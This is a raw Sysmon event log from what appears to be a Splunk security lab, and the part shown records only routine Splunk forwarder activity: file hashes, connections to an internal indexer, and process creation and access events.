23542300x8000000000000000222850Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:14.853{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD4BD585F8E5D554CC4B38F0F2E6E473,SHA256=61165FFD1F7F4C3427EF7BCC4BED0022A3C9CDEE6A123BFC733C469BC7018C14,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299004Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:14.989{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C76AF316BF374E36514CE7F13C14D25,SHA256=FB46C0B05B320786972CA7A85F3FE61AD4DDF9FD3FAC48DB388C19FDDB1ACBFE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222851Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:15.853{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89032BCDCE8C5A22888A028CF9683E32,SHA256=904FA2AA9EBC6B0E88C4401C9B8F984E28567E38D434765A659256CF4EC8EE98,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299005Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:15.990{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D4643526904D1D7AAA5978B84C22BC03,SHA256=E095FCCC571B8730261FE76E80AF00A45127359E347E9FAC9BD9B5AEA5F857F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222853Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:16.869{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FAB75DDAC727823F9A047F41DE21861E,SHA256=B9785D70FEEEC7BCE83DC34B39C932EDA207A4E4CCBDBB67E730845CB87DB669,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299007Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:16.991{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A26F623C7F1A6BF2ADFBCFE9B198B15,SHA256=ED7301EC51CEEA316BF61FE35245FA871F446B6833C447C716140E5AD8CBB99C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000222852Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:13.669{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51745-false10.0.1.12-8000- 354300x8000000000000000299006Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:13.615{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49579-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000222854Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:17.869{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C55BC79091DDFE397D8A7BCCFE005CC0,SHA256=6B24BC4895A78ED55630CBAEFCEA412FC3BD1C8C70B7E14167AD33939D3E9D87,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222855Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:18.869{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2876A800055C4118839A89AA25377484,SHA256=0387767454241B4AEB3E2F4FA06B38A027DF3EEBD75C3522E73F3C1E42EA411E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299008Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:18.006{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=230B40CEB6932E674656B696DBEB2132,SHA256=36D282D354F7140038C2E5B340A9E83F47EDA55D73735DD6825121F337C9034B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222856Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:19.884{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1FA9315E15B1BCD6BE8F3CFC2A7D00AF,SHA256=653E60EB4E404748CBF8131CD2103F66D66C116E6FC15E8DA1CE958A1655B75E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000299018Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:19.675{C8EA50B7-199F-6216-6B07-000000003802}65686980C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299017Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:19.253{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-199F-6216-6B07-000000003802}6568C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299016Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:19.253{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299015Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:19.253{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299014Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:19.253{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299013Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:19.253{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299012Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:19.253{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-199F-6216-6B07-000000003802}6568C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000299011Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:19.253{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-199F-6216-6B07-000000003802}6568C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000299010Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:19.255{C8EA50B7-199F-6216-6B07-000000003802}6568C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000299009Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:19.007{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8A8A94BDF8B6908F48F69CAEBB7B361,SHA256=0A22B4BFE8B22387D8F9CF0BEE06300F7A9F3381C1784D3F8E6C0A7CCCD0BDE2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222857Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:20.900{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD8A2245304F1FC71B736334EAE584C4,SHA256=D339DBF8CC8C149FB7390D103EBE06256FBE1048FFB8770F5F1B899C82511B20,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000299036Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:20.721{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-19A0-6216-6D07-000000003802}2344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299035Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:20.705{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299034Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:20.705{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299033Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:20.705{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-19A0-6216-6D07-000000003802}2344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000299032Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:20.705{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299031Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:20.705{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299030Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:20.705{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-19A0-6216-6D07-000000003802}2344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000299029Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:20.707{C8EA50B7-19A0-6216-6D07-000000003802}2344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000299028Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:20.521{C8EA50B7-19A0-6216-6C07-000000003802}11206204C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299027Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:20.137{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-19A0-6216-6C07-000000003802}1120C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299026Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:20.137{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299025Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 